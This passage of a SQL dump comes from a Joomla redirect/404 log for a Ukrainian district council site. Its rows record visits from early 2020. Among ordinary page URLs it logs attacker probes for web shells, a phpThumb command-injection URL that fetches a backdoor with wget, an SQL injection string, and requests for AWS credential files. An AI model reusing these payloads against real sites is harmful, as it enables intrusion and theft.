00:00:00',301),(34183,'https://malyn-rayrada.gov.ua/index.php/1642-veselogo-rizdva-2&tbnid=t6elsssmqkxdbm&vet=1&docid=-qnaz35vv6vjpm&w=600&h=450&itg=1&q=колядки+назви&source=sh/x/im',NULL,'','',1,0,'2020-01-06 03:48:02','0000-00-00 00:00:00',301),(34184,'https://malyn-rayrada.gov.ua/index.php/1642-veselogo-rizdva-2&tbnid=t6elsssmqkxdbm&vet=1&docid=-qnaz35vv6vjpm&w=600&h=450&itg=1&q=різдво+вірш&hl=uk-ua&source=sh/x/im',NULL,'','',2,0,'2020-01-06 07:55:34','0000-00-00 00:00:00',301),(34185,'https://malyn-rayrada.gov.ua/index.php/1642-veselogo-rizdva-2&docid=-qnaz35vv6vjpm&tbnid=t6elsssmqkxdbm&w=600&h=450&source=sh/x/im',NULL,'','',2,0,'2020-01-06 09:49:36','0000-00-00 00:00:00',301),(34186,'https://malyn-rayrada.gov.ua/index.php/1642-veselogo-rizdva-2&docid=-qnaz35vv6vjpm&tbnid=t6elsssmqkxdbm:&vet=1&w=600&h=450&hl=uk-ua&source=sh/x/im',NULL,'','',1,0,'2020-01-06 10:38:47','0000-00-00 00:00:00',301),(34187,'https://malyn-rayrada.gov.ua/index.php/1642-veselogo-rizdva-2&tbnid=t6elsssmqkxdbm&vet=1&docid=-qnaz35vv6vjpm&w=600&h=450&itg=1&q=з+різдвом+вітаю&source=sh/x/im',NULL,'','',1,0,'2020-01-06 19:33:41','0000-00-00 00:00:00',301),(34188,'https://malyn-rayrada.gov.ua/attachments/article/2329/ð¿ð°ñ ð¿ð¾ñ€ñ‚ ð±ñžð´ð¶ðµñ‚ð½ð¸ñ… ð¿ñ€ð¾ð³ñ€ð°ð¼ 2019.pdf',NULL,'','',1,0,'2020-01-06 19:57:33','0000-00-00 00:00:00',301),(34189,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2266-pro-programu-z-lokalizatsiji-ta-provedennya-borotbi-z-amerikanskim-bilim-metelikom-na-teritoriji-malinskogo-rajonu-na-2019-2023-roki',NULL,'','',2,0,'2020-01-07 02:53:37','0000-00-00 00:00:00',301),(34190,'https://malyn-rayrada.gov.ua/index.php/1642-veselogo-rizdva-2&docid=-qnaz35vv6vjpm&tbnid=t6elsssmqkxdbm:&vet=1&w=600&h=450&source=sh/x/im',NULL,'','',2,0,'2020-01-07 07:59:14','0000-00-00 00:00:00',301),(34191,'https://www.malyn-rayrada.gov.ua/attachments/article/2329/ð¿ð°ñ ð¿ð¾ñ€ñ‚ ð±ñžð´ð¶ðµñ‚ð½ð¸ñ… ð¿ñ€ð¾ð³ñ€ð°ð¼ 2019.pdf',NULL,'','',1,0,'2020-01-07 08:27:25','0000-00-00 00:00:00',301),(34192,'https://malyn-rayrada.gov.ua/index.php/1642-veselogo-rizdva-2&tbnid=t6elsssmqkxdbm&vet=1&docid=-qnaz35vv6vjpm&w=600&h=450&itg=1&q=картинка+з+різдвом&source=sh/x/im',NULL,'','',3,0,'2020-01-07 16:06:34','0000-00-00 00:00:00',301),(34193,'https://malyn-rayrada.gov.ua/layouts/joomla/system/popup-pomo.php',NULL,'http://site.ru','',3,0,'2020-01-08 13:56:59','0000-00-00 00:00:00',301),(34194,'https://malyn-rayrada.gov.ua/modules/mod_footer/tmpl/mark.php',NULL,'http://site.ru','',5,0,'2020-01-08 14:27:08','0000-00-00 00:00:00',301),(34195,'https://malyn-rayrada.gov.ua/components/com_search/models/mark.php',NULL,'http://site.ru','',3,0,'2020-01-08 20:58:00','0000-00-00 00:00:00',301),(34196,'https://malyn-rayrada.gov.ua/ns.php',NULL,'http://site.ru','',3,0,'2020-01-08 22:13:48','0000-00-00 00:00:00',301),(34197,'https://malyn-rayrada.gov.ua/libraries/joomla/template/rice.php',NULL,'http://site.ru','',5,0,'2020-01-08 23:36:10','0000-00-00 00:00:00',301),(34198,'https://malyn-rayrada.gov.ua/layouts/joomla/system/mark.php',NULL,'http://site.ru','',2,0,'2020-01-09 07:28:42','0000-00-00 00:00:00',301),(34199,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-07-12-2016-roku?format=feed\\u0026type=rss',NULL,'','',1,0,'2020-01-09 07:30:53','0000-00-00 00:00:00',301),(34200,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-15062018-roku?format=feed\\u0026type=rss',NULL,'','',1,0,'2020-01-09 07:30:53','0000-00-00 00:00:00',301),(34201,'https://malyn-rayrada.gov.ua/components/com_search/models/popup-pomo.php',NULL,'http://site.ru','',2,0,'2020-01-09 10:02:42','0000-00-00 00:00:00',301),(34202,'https://malyn-rayrada.gov.ua/libraries/phputf8/str_parser.php',NULL,'http://site.ru','',4,0,'2020-01-09 11:27:50','0000-00-00 00:00:00',301),(34203,'https://malyn-rayrada.gov.ua/models.php',NULL,'http://site.ru','',1,0,'2020-01-09 18:15:59','0000-00-00 00:00:00',301),(34204,'https://www.malyn-rayrada.gov.ua/attachments/article/2182/ð¿ð°ñ ð¿ð¾ñ€ñ‚.pdf',NULL,'','',1,0,'2020-01-09 19:17:24','0000-00-00 00:00:00',301),(34205,'https://www.malyn-rayrada.gov.ua/attachments/article/2243/ð¿ð°ñ ð¿ð¾ñ€ñ‚ð¸ ð¿ñ€ð¾ð³ñ€ð°ð¼.pdf',NULL,'','',1,0,'2020-01-09 19:29:18','0000-00-00 00:00:00',301),(34206,'https://www.malyn-rayrada.gov.ua/attachments/article/2182/ð¿ð°ñ ð¿ð¾ñ€ñ‚1.pdf',NULL,'','',1,0,'2020-01-09 19:51:45','0000-00-00 00:00:00',301),(34207,'https://www.malyn-rayrada.gov.ua/attachments/article/2182/ð¿ð°ñ ð¿ð¾ñ€ñ‚2.pdf',NULL,'','',1,0,'2020-01-09 19:57:47','0000-00-00 00:00:00',301),(34208,'https://www.malyn-rayrada.gov.ua/attachments/article/2182/ð¿ð°ñ ð¿ð¾ñ€ñ‚3.pdf',NULL,'','',1,0,'2020-01-09 20:09:23','0000-00-00 00:00:00',301),(34209,'https://malyn-rayrada.gov.ua/phpmail/popup-pomo.php',NULL,'http://site.ru','',3,0,'2020-01-09 20:34:04','0000-00-00 00:00:00',301),(34210,'https://malyn-rayrada.gov.ua/templates/beez_20/content-post.php',NULL,'http://site.ru','',9,0,'2020-01-10 11:01:14','0000-00-00 00:00:00',301),(34211,'https://malyn-rayrada.gov.ua/libraries/joomla/base/content-post.php',NULL,'http://site.ru','',2,0,'2020-01-10 12:17:48','0000-00-00 00:00:00',301),(34212,'https://malyn-rayrada.gov.ua/assets/images/blackhat.php',NULL,'http://site.ru','',1,0,'2020-01-10 18:27:48','0000-00-00 00:00:00',301),(34213,'https://malyn-rayrada.gov.ua/homefeatured/content-post.php',NULL,'http://site.ru','',1,0,'2020-01-11 01:41:26','0000-00-00 00:00:00',301),(34214,'https://malyn-rayrada.gov.ua/domains/xspace.sk/libraries/joomla/template/content-post.php',NULL,'http://site.ru','',1,0,'2020-01-11 01:41:27','0000-00-00 00:00:00',301),(34215,'https://malyn-rayrada.gov.ua/templates/atomic/language/en-gb/content-post.php',NULL,'http://site.ru','',3,0,'2020-01-11 01:57:55','0000-00-00 00:00:00',301),(34216,'https://malyn-rayrada.gov.ua/language/content-post.php',NULL,'http://site.ru','',2,0,'2020-01-11 03:32:41','0000-00-00 00:00:00',301),(34217,'https://malyn-rayrada.gov.ua/general/content-post.php',NULL,'http://site.ru','',3,0,'2020-01-11 07:22:21','0000-00-00 00:00:00',301),(34218,'https://malyn-rayrada.gov.ua/kickstart.php',NULL,'https://malyn-rayrada.gov.ua/kickstart.php','',2,0,'2020-01-12 11:35:38','0000-00-00 00:00:00',301),(34219,'https://malyn-rayrada.gov.ua/index.php/1027-kogo-torknutsya-zmini-do-pensijnogo-zakonodavstva',NULL,'','',1,0,'2020-01-15 18:50:23','0000-00-00 00:00:00',301),(34220,'https://malyn-rayrada.gov.ua/js/kcfinder/browse.php',NULL,'','',1,0,'2020-01-16 04:41:05','0000-00-00 00:00:00',301),(34221,'https://malyn-rayrada.gov.ua/templates/streamed.php',NULL,'http://site.ru','',1,0,'2020-01-16 15:13:00','0000-00-00 00:00:00',301),(34222,'https://malyn-rayrada.gov.ua/modules/mod_carramba/shoes.php',NULL,'http://site.ru','',2,0,'2020-01-16 19:11:44','0000-00-00 00:00:00',301),(34223,'https://malyn-rayrada.gov.ua/ghjk.php',NULL,'http://site.ru','',2,0,'2020-01-16 22:19:51','0000-00-00 00:00:00',301),(34224,'https://malyn-rayrada.gov.ua/images/up2.php',NULL,'http://site.ru','',2,0,'2020-01-17 00:33:17','0000-00-00 00:00:00',301),(34225,'https://malyn-rayrada.gov.ua/templates/beez3/html/com_contact/category/bag.php',NULL,'http://site.ru','',2,0,'2020-01-17 02:20:31','0000-00-00 00:00:00',301),(34226,'https://malyn-rayrada.gov.ua/modules/mod_carramba/content-post.php',NULL,'http://site.ru','',1,0,'2020-01-17 02:21:01','0000-00-00 00:00:00',301),(34227,'https://malyn-rayrada.gov.ua/cache/sim5.php',NULL,'http://site.ru','',1,0,'2020-01-17 04:33:09','0000-00-00 00:00:00',301),(34228,'https://malyn-rayrada.gov.ua/shoes.php',NULL,'http://site.ru','',8,0,'2020-01-17 06:57:12','0000-00-00 00:00:00',301),(34229,'https://malyn-rayrada.gov.ua/wool.php',NULL,'http://site.ru','',6,0,'2020-01-17 08:52:55','0000-00-00 00:00:00',301),(34230,'https://malyn-rayrada.gov.ua/wp-admin/87/mini.php',NULL,'http://site.ru','',2,0,'2020-01-17 14:05:15','0000-00-00 00:00:00',301),(34231,'https://malyn-rayrada.gov.ua/images/.h..php',NULL,'http://site.ru','',2,0,'2020-01-17 14:11:59','0000-00-00 00:00:00',301),(34232,'https://malyn-rayrada.gov.ua/templates/beez3/html/com_newsfeeds/wp-side.php',NULL,'http://site.ru','',2,0,'2020-01-17 16:01:43','0000-00-00 00:00:00',301),(34233,'https://malyn-rayrada.gov.ua/layouts/joomla/sidebars/beautifu.php',NULL,'http://site.ru','',1,0,'2020-01-17 17:01:45','0000-00-00 00:00:00',301),(34234,'https://malyn-rayrada.gov.ua/templates/wp-side.php',NULL,'http://site.ru','',3,0,'2020-01-17 17:23:27','0000-00-00 00:00:00',301),(34235,'https://malyn-rayrada.gov.ua/layouts/libraries/cms/html/bootstrap/.h..php',NULL,'http://site.ru','',2,0,'2020-01-17 17:53:07','0000-00-00 00:00:00',301),(34236,'https://malyn-rayrada.gov.ua/layouts/joomla/searchtools/default/wp-side.php',NULL,'http://site.ru','',3,0,'2020-01-17 18:19:14','0000-00-00 00:00:00',301),(34237,'https://malyn-rayrada.gov.ua/layouts/joomla/tinymce/wp-side.php',NULL,'http://site.ru','',1,0,'2020-01-17 18:50:26','0000-00-00 00:00:00',301),(34238,'https://malyn-rayrada.gov.ua/templates/beez3/html/layouts/wp-side.php',NULL,'http://site.ru','',1,0,'2020-01-17 19:42:34','0000-00-00 00:00:00',301),(34239,'https://malyn-rayrada.gov.ua/layouts/joomla/searchtools/bag.php',NULL,'http://site.ru','',2,0,'2020-01-17 19:43:09','0000-00-00 00:00:00',301),(34240,'https://malyn-rayrada.gov.ua/templates/beez3/html/com_content/archive/gank.php.php',NULL,'http://site.ru','',2,0,'2020-01-17 20:33:13','0000-00-00 00:00:00',301),(34241,'https://malyn-rayrada.gov.ua/templates/beez3/html/layouts/joomla/beautifu.php',NULL,'http://site.ru','',2,0,'2020-01-17 23:50:35','0000-00-00 00:00:00',301),(34242,'https://malyn-rayrada.gov.ua/lux.php',NULL,'http://site.ru','',5,0,'2020-01-18 00:15:54','0000-00-00 00:00:00',301),(34243,'https://malyn-rayrada.gov.ua/templates/beez3/html/com_contact/categories/gank.php.php',NULL,'http://site.ru','',2,0,'2020-01-18 07:58:54','0000-00-00 00:00:00',301),(34244,'https://malyn-rayrada.gov.ua/layouts/joomla/beautifu.php',NULL,'http://site.ru','',1,0,'2020-01-18 08:13:55','0000-00-00 00:00:00',301),(34245,'https://malyn-rayrada.gov.ua/modules/mod_carramba/wool.php',NULL,'http://site.ru','',1,0,'2020-01-18 09:29:02','0000-00-00 00:00:00',301),(34246,'https://malyn-rayrada.gov.ua/templates/beez3/html/com_weblinks/.h..php',NULL,'http://site.ru','',2,0,'2020-01-18 14:22:56','0000-00-00 00:00:00',301),(34247,'https://malyn-rayrada.gov.ua/templates/delcon/js/.h..php',NULL,'http://site.ru','',2,0,'2020-01-18 16:11:08','0000-00-00 00:00:00',301),(34248,'https://malyn-rayrada.gov.ua/layouts/joomla/streamed.php',NULL,'http://site.ru','',1,0,'2020-01-18 16:24:22','0000-00-00 00:00:00',301),(34249,'https://malyn-rayrada.gov.ua/layouts/joomla/toolbar/wp-side.php',NULL,'http://site.ru','',2,0,'2020-01-18 17:27:42','0000-00-00 00:00:00',301),(34250,'https://malyn-rayrada.gov.ua/wp-admin/87/5.php',NULL,'http://site.ru','',1,0,'2020-01-18 17:41:14','0000-00-00 00:00:00',301),(34251,'https://malyn-rayrada.gov.ua/templates/beez3/html/com_content/form/streamed.php',NULL,'http://site.ru','',1,0,'2020-01-18 17:56:50','0000-00-00 00:00:00',301),(34252,'https://malyn-rayrada.gov.ua/includes/.h..php',NULL,'http://site.ru','',1,0,'2020-01-18 19:11:47','0000-00-00 00:00:00',301),(34253,'https://malyn-rayrada.gov.ua/layouts/joomla/gank.php.php',NULL,'http://site.ru','',2,0,'2020-01-18 22:54:29','0000-00-00 00:00:00',301),(34254,'https://malyn-rayrada.gov.ua/media/k2/videos/wp-side.php',NULL,'http://site.ru','',2,0,'2020-01-18 23:53:30','0000-00-00 00:00:00',301),(34255,'https://malyn-rayrada.gov.ua/modules/gank.php.php',NULL,'http://site.ru','',1,0,'2020-01-19 00:46:10','0000-00-00 00:00:00',301),(34256,'https://malyn-rayrada.gov.ua/templates/system/images/beautifu.php',NULL,'http://site.ru','',2,0,'2020-01-19 01:07:18','0000-00-00 00:00:00',301),(34257,'https://malyn-rayrada.gov.ua/modules/mod_stats/tmpl/beautifu.php',NULL,'http://site.ru','',2,0,'2020-01-19 04:07:19','0000-00-00 00:00:00',301),(34258,'https://malyn-rayrada.gov.ua/neter.php',NULL,'http://site.ru','',2,0,'2020-01-20 18:32:28','0000-00-00 00:00:00',301),(34259,'https://malyn-rayrada.gov.ua/components/com_allvideoshare/assets/js/wp-side.php',NULL,'http://site.ru','',2,0,'2020-01-20 18:56:30','0000-00-00 00:00:00',301),(34260,'https://malyn-rayrada.gov.ua/components/com_banners/models/mod.php',NULL,'http://site.ru','',6,0,'2020-01-20 19:03:21','0000-00-00 00:00:00',301),(34261,'https://malyn-rayrada.gov.ua/aa.php',NULL,'http://site.ru','',3,0,'2020-01-20 20:26:48','0000-00-00 00:00:00',301),(34262,'https://malyn-rayrada.gov.ua/modules/mod.php',NULL,'http://site.ru','',13,0,'2020-01-20 20:49:13','0000-00-00 00:00:00',301),(34263,'https://malyn-rayrada.gov.ua/components/com_allvideoshare/views/videos/.h..php',NULL,'http://site.ru','',3,0,'2020-01-20 21:52:12','0000-00-00 00:00:00',301),(34264,'https://malyn-rayrada.gov.ua/images/shell.php',NULL,'http://site.ru','',1,0,'2020-01-20 21:58:00','0000-00-00 00:00:00',301),(34265,'https://malyn-rayrada.gov.ua/templates/beez3/html/com_content/featured/beautifu.php',NULL,'http://site.ru','',2,0,'2020-01-20 22:35:33','0000-00-00 00:00:00',301),(34266,'https://malyn-rayrada.gov.ua/or.php',NULL,'http://site.ru','',1,0,'2020-01-20 23:26:12','0000-00-00 00:00:00',301),(34267,'https://malyn-rayrada.gov.ua/wp-admini.php',NULL,'http://site.ru','',1,0,'2020-01-20 23:54:13','0000-00-00 00:00:00',301),(34268,'https://malyn-rayrada.gov.ua/apple-app-site-association',NULL,'','',5,0,'2020-01-21 11:42:04','0000-00-00 00:00:00',301),(34269,'https://www.malyn-rayrada.gov.ua/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;wget -s https://raw.githubusercontent.com/mantod/shell-backdoor/master/php/mini.php;rm mini.php.1;&phpthumbdebug=9',NULL,'','',2,0,'2020-01-22 06:16:35','0000-00-00 00:00:00',301),(34270,'https://www.malyn-rayrada.gov.ua/images/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;wget -s https://raw.githubusercontent.com/mantod/shell-backdoor/master/php/mini.php;rm mini.php.1;&phpthumbdebug=9',NULL,'','',2,0,'2020-01-22 06:16:37','0000-00-00 00:00:00',301),(34271,'https://www.malyn-rayrada.gov.ua/scripts/phpthumbphpthumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;wget -s https://raw.githubusercontent.com/mantod/shell-backdoor/master/php/mini.php;rm mini.php.1;&phpthumbdebug=9',NULL,'','',2,0,'2020-01-22 06:16:38','0000-00-00 00:00:00',301),(34272,'https://www.malyn-rayrada.gov.ua/wp-json/wp/v2/users',NULL,'','',1,0,'2020-01-22 16:15:57','0000-00-00 00:00:00',301),(34273,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-11122019-roku/2326-pro-rajonnij-byudzhet-malinskogo-rajonu-na-2020-rik',NULL,'','',8,0,'2020-01-22 20:08:01','0000-00-00 00:00:00',301),(34274,'https://www.malyn-rayrada.gov.ua/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',3,0,'2020-01-24 15:24:22','0000-00-00 00:00:00',301),(34275,'https://malyn-rayrada.gov.ua//wp-admin/install.php',NULL,'','',2,0,'2020-01-24 23:24:01','0000-00-00 00:00:00',301),(34276,'https://malyn-rayrada.gov.ua/wp-content/uploads/2020/01/',NULL,'','',2,0,'2020-01-25 03:46:40','0000-00-00 00:00:00',301),(34277,'https://www.malyn-rayrada.gov.ua//wp-admin/install.php',NULL,'','',1,0,'2020-01-25 12:15:29','0000-00-00 00:00:00',301),(34278,'https://malyn-rayrada.gov.ua/index.php/2194-informatsiya-shchodo-bereznevikh-pererakhunkiv-pensij',NULL,'','',58,0,'2020-01-26 06:08:52','0000-00-00 00:00:00',301),(34279,'https://www.malyn-rayrada.gov.ua/index.php/2199-14-bereznya-den-ukrajinskogo-dobrovoltsya',NULL,'','',11,0,'2020-01-26 23:46:26','0000-00-00 00:00:00',301),(34280,'https://malyn-rayrada.gov.ua/index.php/2191-malinske-rajonne-upravlinnya-golovnogo-upravlinnya-derzhprodspozhivsluzhbi-v-zhitomirskij-oblasti-informue-3',NULL,'','',11,0,'2020-01-27 06:42:28','0000-00-00 00:00:00',301),(34281,'https://www.malyn-rayrada.gov.ua/index.php/2181-informatsiya-iz-chempionatu-oblasti-iz-vilnoji-borotbi',NULL,'','',3,0,'2020-01-28 13:31:42','0000-00-00 00:00:00',301),(34282,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-11122019-roku/2326-pro-rajonnij-byudzhet-malinskogo-rajonu-na-2020-rik',NULL,'','',1,0,'2020-01-28 16:32:30','0000-00-00 00:00:00',301),(34283,'https://malyn-rayrada.gov.ua/shop.php?id=1\'',NULL,'','',1,0,'2020-01-28 17:35:42','0000-00-00 00:00:00',301),(34284,'https://www.malyn-rayrada.gov.ua/index.php/2184-zatverdzheno-pokaznik-serednoji-zarobitnoji-plati-za-gruden-2018-roku-ta-za-2018-rik',NULL,'','',3,0,'2020-01-28 18:54:54','0000-00-00 00:00:00',301),(34285,'https://www.malyn-rayrada.gov.ua/index.php/2191-malinske-rajonne-upravlinnya-golovnogo-upravlinnya-derzhprodspozhivsluzhbi-v-zhitomirskij-oblasti-informue-3',NULL,'','',2,0,'2020-01-28 18:54:57','0000-00-00 00:00:00',301),(34286,'https://www.malyn-rayrada.gov.ua/index.php/2193-vidbulos-zasidannya-kruglogo-stolu-na-temu-gotovnist-do-viplati-monetizatsiji-subsidij-ta-shchodo-provedennya-indeksatsiji-pensij-z-bereznya-2019-roku',NULL,'','',4,0,'2020-01-28 18:55:01','0000-00-00 00:00:00',301),(34287,'https://www.malyn-rayrada.gov.ua/index.php/2195-shche-raz-shchodo-viplati-monetizovanikh-zhitlovikh-subsidij',NULL,'','',3,0,'2020-01-28 18:55:04','0000-00-00 00:00:00',301),(34288,'https://www.malyn-rayrada.gov.ua/index.php/2198-yak-zaoshchadzhuvati-svij-byudzhet',NULL,'','',3,0,'2020-01-28 18:55:07','0000-00-00 00:00:00',301),(34289,'https://malyn-rayrada.gov.ua/.aws/credentials',NULL,'','',3,0,'2020-02-01 14:57:58','0000-00-00 00:00:00',301),(34290,'https://malyn-rayrada.gov.ua/oldsite/',NULL,'','',2,0,'2020-02-01 19:54:06','0000-00-00 00:00:00',301),(34291,'https://malyn-rayrada.gov.ua/back/',NULL,'','',2,0,'2020-02-01 19:54:08','0000-00-00 00:00:00',301),(34292,'https://malyn-rayrada.gov.ua/index.php/2195-shche-raz-shchodo-viplati-monetizovanikh-zhitlovikh-subsidij',NULL,'','',13,0,'2020-02-02 19:47:18','0000-00-00 00:00:00',301),(34293,'https://malyn-rayrada.gov.ua/ckfinder/ckfinder.html',NULL,'','',1,0,'2020-02-03 10:01:53','0000-00-00 00:00:00',301),(34294,'https://malyn-rayrada.gov.ua/index.php/2199-14-bereznya-den-ukrajinskogo-dobrovoltsya',NULL,'','',12,0,'2020-02-03 13:55:06','0000-00-00 00:00:00',301),(34295,'https://malyn-rayrada.gov.ua//vjkdmoplrfkkn.php',NULL,'https://malyn-rayrada.gov.ua//VjKDMoplRFkkN.php','',1,0,'2020-02-03 23:45:29','0000-00-00 00:00:00',301),(34296,'https://malyn-rayrada.gov.ua//shell.php',NULL,'','',2,0,'2020-02-04 04:58:47','0000-00-00 00:00:00',301),(34297,'https://www.malyn-rayrada.gov.ua//shell.php',NULL,'','',1,0,'2020-02-05 00:53:45','0000-00-00 00:00:00',301),(34298,'https://www.malyn-rayrada.gov.ua/index.php/2201-shche-raz-pro-pidvishchennya-pensij-z-1-bereznya-2019-roku',NULL,'','',1,0,'2020-02-05 09:02:54','0000-00-00 00:00:00',301),(34299,'https://malyn-rayrada.gov.ua/index.php/2181-informatsiya-iz-chempionatu-oblasti-iz-vilnoji-borotbi',NULL,'','',14,0,'2020-02-07 10:45:56','0000-00-00 00:00:00',301),(34300,'https://malyn-rayrada.gov.ua/joomla/users-component/registration-form',NULL,'','',6,0,'2020-02-07 21:24:56','0000-00-00 00:00:00',301),(34301,'https://malyn-rayrada.gov.ua/index.php/using-joomla/extensions/components/users-component/registration-form',NULL,'','',6,0,'2020-02-07 21:24:56','0000-00-00 00:00:00',301),(34302,'https://malyn-rayrada.gov.ua/register',NULL,'','',6,0,'2020-02-07 21:24:56','0000-00-00 00:00:00',301),(34303,'https://malyn-rayrada.gov.ua/signup',NULL,'','',6,0,'2020-02-07 21:24:57','0000-00-00 00:00:00',301),(34304,'https://malyn-rayrada.gov.ua/blogs/wp-login.php',NULL,'','',4,0,'2020-02-07 23:38:48','0000-00-00 00:00:00',301),(34305,'https://malyn-rayrada.gov.ua/home/wp-login.php',NULL,'','',4,0,'2020-02-07 23:38:48','0000-00-00 00:00:00',301),(34306,'https://malyn-rayrada.gov.ua/press/wp-login.php',NULL,'','',4,0,'2020-02-07 23:38:48','0000-00-00 00:00:00',301),(34307,'https://malyn-rayrada.gov.ua/wpmu/wp-login.php',NULL,'','',4,0,'2020-02-07 23:38:48','0000-00-00 00:00:00',301),(34308,'https://malyn-rayrada.gov.ua/web/wp-login.php',NULL,'','',4,0,'2020-02-07 23:38:48','0000-00-00 00:00:00',301),(34309,'https://malyn-rayrada.gov.ua/new/wp-login.php',NULL,'','',4,0,'2020-02-07 23:38:48','0000-00-00 00:00:00',301),(34310,'https://malyn-rayrada.gov.ua/news/wp-login.php',NULL,'','',4,0,'2020-02-07 23:38:49','0000-00-00 00:00:00',301),(34311,'https://malyn-rayrada.gov.ua/site/wp-login.php',NULL,'','',4,0,'2020-02-07 23:38:49','0000-00-00 00:00:00',301),(34312,'https://malyn-rayrada.gov.ua/sites/wp-login.php',NULL,'','',4,0,'2020-02-07 23:38:49','0000-00-00 00:00:00',301),(34313,'https://malyn-rayrada.gov.ua/sitio/wp-login.php',NULL,'','',4,0,'2020-02-07 23:38:49','0000-00-00 00:00:00',301),(34314,'https://malyn-rayrada.gov.ua/en/wp-login.php',NULL,'','',4,0,'2020-02-07 23:38:49','0000-00-00 00:00:00',301),(34315,'https://malyn-rayrada.gov.ua/old/wp-login.php',NULL,'','',4,0,'2020-02-07 23:38:49','0000-00-00 00:00:00',301),(34316,'https://malyn-rayrada.gov.ua/info/wp-login.php',NULL,'','',4,0,'2020-02-07 23:38:49','0000-00-00 00:00:00',301),(34317,'https://malyn-rayrada.gov.ua/portal/wp-login.php',NULL,'','',4,0,'2020-02-07 23:38:50','0000-00-00 00:00:00',301),(34318,'https://malyn-rayrada.gov.ua/english/wp-login.php',NULL,'','',4,0,'2020-02-07 23:38:50','0000-00-00 00:00:00',301),(34319,'https://www.malyn-rayrada.gov.ua/index.php/2194-informatsiya-shchodo-bereznevikh-pererakhunkiv-pensij',NULL,'','',4,0,'2020-02-08 22:29:34','0000-00-00 00:00:00',301),(34320,'https://malyn-rayrada.gov.ua/index.php/2193-vidbulos-zasidannya-kruglogo-stolu-na-temu-gotovnist-do-viplati-monetizatsiji-subsidij-ta-shchodo-provedennya-indeksatsiji-pensij-z-bereznya-2019-roku',NULL,'','',9,0,'2020-02-09 00:13:01','0000-00-00 00:00:00',301),(34321,'https://malyn-rayrada.gov.ua/index.php/templatefiles/yearbook.css',NULL,'https://malyn-rayrada.gov.ua/index.php/2289-vikonannya-dokhidnoji-chastini-byudzhetiv-mist-rajoniv-ta-otg-za-10-misyatsiv-2019-roku','',1,0,'2020-02-13 14:24:11','0000-00-00 00:00:00',301),(34322,'https://malyn-rayrada.gov.ua/index.php/templatefiles/actions.js',NULL,'https://malyn-rayrada.gov.ua/index.php/2289-vikonannya-dokhidnoji-chastini-byudzhetiv-mist-rajoniv-ta-otg-za-10-misyatsiv-2019-roku','',1,0,'2020-02-13 14:24:12','0000-00-00 00:00:00',301),(34323,'https://malyn-rayrada.gov.ua/index.php/oldadmin/view_entity_picture.asp?entityid=30320',NULL,'https://malyn-rayrada.gov.ua/index.php/2289-vikonannya-dokhidnoji-chastini-byudzhetiv-mist-rajoniv-ta-otg-za-10-misyatsiv-2019-roku','',1,0,'2020-02-13 14:24:12','0000-00-00 00:00:00',301),(34324,'https://malyn-rayrada.gov.ua/picserror/2-0-4_3-0-6_10-0-17/-/0',NULL,'','',1,0,'2020-02-13 14:24:14','0000-00-00 00:00:00',301),(34325,'https://malyn-rayrada.gov.ua/index.php/2200-komunalne-pidpriemstvo-arkhplan-malinskoji-rajonnoji-radi-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu',NULL,'','',11,0,'2020-02-13 21:47:14','0000-00-00 00:00:00',301),(34326,'https://malyn-rayrada.gov.ua/index.php/2201-shche-raz-pro-pidvishchennya-pensij-z-1-bereznya-2019-roku',NULL,'','',10,0,'2020-02-14 08:28:26','0000-00-00 00:00:00',301),(34327,'https://malyn-rayrada.gov.ua/index.php/2162-ogoloshennya-pro-vilne-nerukhome-majno',NULL,'','',10,0,'2020-02-14 21:42:03','0000-00-00 00:00:00',301),(34328,'https://malyn-rayrada.gov.ua/index.php/2198-yak-zaoshchadzhuvati-svij-byudzhet',NULL,'','',6,0,'2020-02-15 04:55:38','0000-00-00 00:00:00',301),(34329,'https://www.malyn-rayrada.gov.ua/index.php/2162-ogoloshennya-pro-vilne-nerukhome-majno',NULL,'','',5,0,'2020-02-15 20:49:20','0000-00-00 00:00:00',301),(34330,'https://malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45?format=feedand updatexml(rand(),concat(char(126),version(),char(126)),null)&type=rss',NULL,'','',1,0,'2020-02-18 18:21:50','0000-00-00 00:00:00',301),(34331,'https://malyn-rayrada.gov.ua/.../',NULL,'','',2,0,'2020-02-21 09:22:00','0000-00-00 00:00:00',301),(34332,'https://malyn-rayrada.gov.ua//index.php/kontakti',NULL,'','',1,0,'2020-02-23 14:52:07','0000-00-00 00:00:00',301),(34333,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennia-vid-17022020-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34334,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennia-vid-18102019-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34335,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennia-vid-14062019-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34336,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennia-vid-26102018-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34337,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennia-vid-271017-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34338,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennia-vid-10082018-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 00:00:00',301),(34339,'https://malyn-rayrada.gov.ua//index.php/rishennja-radi/rishennja/rishennia-vid-02022018-roku',NULL,'','',1,0,'2020-02-23 14:52:11','0000-00-00 